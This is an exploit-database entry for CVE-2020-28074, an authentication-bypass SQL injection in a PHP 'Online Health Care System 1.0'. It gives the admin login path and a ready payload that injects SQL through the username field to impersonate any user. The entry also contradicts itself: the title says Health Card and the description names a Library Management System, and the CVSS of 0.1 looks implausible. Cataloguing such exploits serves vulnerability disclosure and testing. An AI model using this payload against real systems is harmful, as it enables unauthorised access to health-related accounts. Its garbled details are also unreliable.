Exploit for Online Health Card System 1.0 SQL Injection CVE-2020-28074

Name: Exploit for Online Health Card System 1.0 SQL Injection CVE-2020-28074
Rating: 5 (129 reviews)

2020-12-17 | CVSS 0.1

## https://sploitus.com/exploit?id=PACKETSTORM:160599
# Exploit Title: Authentication Bypass via SQL injection on Online Health Care System 1.0 # Date: 23/10/2020  
# Exploit Author: Valerio Alessandroni  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link:  
https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code- 2020.html  
# Version: 1.0  
# Tested on: ubuntu 18.04  
# CVE : CVE-2020-28074  
# Description:  
SQL injection on Library Management System v1.0 allows a potentially attacker to bypass the user authentication and impersonificate every user on the system.  
# Reproduction:  
- Go to login page (http://127.0.0.1/HealthCare/Admin/adminlogin.php) - intercept the login request and replace the parameters  
username=admin@email.test' AND 1=1;-- - password=RandomlyText